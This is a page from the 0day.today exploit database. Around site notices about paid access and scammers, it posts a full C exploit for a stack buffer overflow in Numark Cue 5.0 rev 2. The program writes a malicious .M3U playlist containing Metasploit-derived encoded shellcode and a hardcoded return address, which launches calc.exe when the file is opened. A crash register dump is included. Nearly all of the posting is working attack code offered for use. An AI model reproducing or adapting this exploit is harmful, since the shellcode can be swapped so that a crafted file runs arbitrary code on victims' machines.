0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Numark Cue 5.0 rev 2 Local .M3U File Stack Buffer Overflow Exploit
================================================================== Numark Cue 5.0 rev 2 Local .M3U File Stack Buffer Overflow Exploit ================================================================== /*Numark Cue 5.0 rev 2 Local .M3U File Stack Buffer Overflow This sploit Launches calc.exe .. classical buffer overflow ,a 500 byte buffer is causing the exeption. Tested on WinXP Pro sp3,compiled with DEv-C++ 4.9.9.2. After preparation: |Access violation when executing [58414158]| EAX 00000001 ECX 004C01B2 cue_tria.004C01B2 EDX 01030608 EBX 0309948D ASCII "I:\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ESP 0013EC98 ASCII "eeeeeeeeeeeeeeeeeeeeeeeeeeeYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYr Of The Dog Again (2006)[T-Boyz]\13. DMX - Life be my Song.mp3.jpg" EBP 00000000 ESI 016016E0 EDI 00000000 EIP 58414158 Geetz to my friends Gil-Dong,Marsu,Expanders,Str0ke,Razvan,Vlad and all the people that I know...find me in Regie. */ #include<stdio.h> #include<stdlib.h> #include<string.h> #include<windows.h> #define OFFSET 549 //got this shellcode from metasploit char shellcode[]= "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49" "\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x37\x6a\x63" "\x58\x30\x42\x30\x50\x42\x6b\x42\x41\x73\x41\x42\x32\x42\x41\x32" "\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x38\x69\x69\x6c\x38" "\x68\x41\x54\x77\x70\x57\x70\x75\x50\x6e\x6b\x41\x55\x55\x6c\x6e" "\x6b\x43\x4c\x66\x65\x41\x68\x45\x51\x58\x6f\x4c\x4b\x50\x4f\x62" "\x38\x6e\x6b\x41\x4f\x31\x30\x36\x61\x4a\x4b\x41\x59\x6c\x4b\x74" "\x74\x6e\x6b\x44\x41\x4a\x4e\x47\x41\x4b\x70\x6f\x69\x6c\x6c\x4c" "\x44\x4b\x70\x43\x44\x76\x67\x4b\x71\x4a\x6a\x66\x6d\x66\x61\x39" "\x52\x5a\x4b\x4a\x54\x75\x6b\x62\x74\x56\x44\x73\x34\x41\x65\x4b" "\x55\x4e\x6b\x73\x6f\x54\x64\x53\x31\x6a\x4b\x35\x36\x6c\x4b\x64" "\x4c\x30\x4b\x6c\x4b\x73\x6f\x57\x6c\x75\x51\x6a\x4b\x6c\x4b\x37" "\x6c\x6c\x4b\x77\x71\x68\x6b\x4c\x49\x71\x4c\x51\x34\x43\x34\x6b" "\x73\x46\x51\x79\x50\x71\x74\x4c\x4b\x67\x30\x36\x50\x4c\x45\x4b" "\x70\x62\x58\x74\x4c\x6c\x4b\x53\x70\x56\x6c\x4e\x6b\x34\x30\x47" "\x6c\x4e\x4d\x6c\x4b\x70\x68\x37\x78\x58\x6b\x53\x39\x6c\x4b\x4f" "\x70\x6c\x70\x53\x30\x43\x30\x73\x30\x6c\x4b\x42\x48\x77\x4c\x61" "\x4f\x44\x71\x6b\x46\x73\x50\x72\x76\x6b\x39\x5a\x58\x6f\x73\x4f" "\x30\x73\x4b\x56\x30\x31\x78\x61\x6e\x6a\x78\x4b\x52\x74\x33\x55" "\x38\x4a\x38\x69\x6e\x6c\x4a\x54\x4e\x52\x77\x79\x6f\x79\x77\x42" "\x43\x50\x61\x70\x6c\x41\x73\x64\x6e\x51\x75\x52\x58\x31\x75\x57" "\x70\x63"; char file_start[]= "\x23\x56\x69\x72\x74\x75\x61\x6C\x44\x4A" "\x20\x50\x6C\x61\x79\x6C\x69\x73\x74\x0D" "\x0A\x23\x4D\x69\x78\x54\x79\x70\x65\x3D" "\x53\x6D\x61\x72\x74\x0D\x0A\x49\x3A\x5C"; char file_end[]= "\x72\x20\x4F\x66\x20\x54\x68\x65\x20\x44" "\x6F\x67\x20\x41\x67\x61\x69\x6E\x20\x28" "\x32\x30\x30\x36\x29\x5B\x54\x2D\x42\x6F" "\x79\x7A\x5D\x5C\x31\x33\x2E\x20\x44\x4D" "\x58\x20\x2D\x20\x4C\x69\x66\x65\x20\x62" "\x65\x20\x6D\x79\x20\x53\x6F\x6E\x67\x2E" "\x6D\x70\x33\x0D\x0A\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00"; int main(int argc, char *argv[]) { FILE *y; unsigned char *buffer; unsigned int offset=0; unsigned int NEW_EIP=0x7C8369F0; if(argc<2) { printf("****************************************\n"); printf("USAGE IS:"); printf("FileName.m3u\n"); printf("Credits for finding the bug and sploit go to fl0 fl0w \n"); printf("****************************************\n"); system("color 02"); Sleep(2000); return 0; } if((y=fopen(argv[1],"wb"))==NULL) { printf("error"); exit(0); } printf("************************************************************\n"); printf("Numark Cue 5.0 rev 2 .M3U File Stack Buffer Overflow\n"); printf("Credits for finding the bug and sploit go to fl0 fl0w \n"); printf("File successfully buit,open with Numark Cue :)\n"); printf("************************************************************\n"); system("color 03"); buffer=(unsigned char *)malloc(OFFSET+strlen(file_start)+strlen(file_end)+4+1+strlen(shellcode)+15); memset(buffer,0x90,OFFSET+strlen(file_start)+strlen(file_end)+4+1+strlen(shellcode)+15); memcpy(buffer,file_start,strlen(file_start)); offset=OFFSET; memcpy(buffer+offset,&NEW_EIP,4); offset+=4; offset+=15; memcpy(buffer+offset,shellcode,strlen(shellcode)); offset+=strlen(shellcode); memcpy(buffer+offset,file_end,strlen(file_end)); offset+=strlen(file_end); fprintf(y,"%s",buffer); return 0; } # 0day.today [2024-12-25] #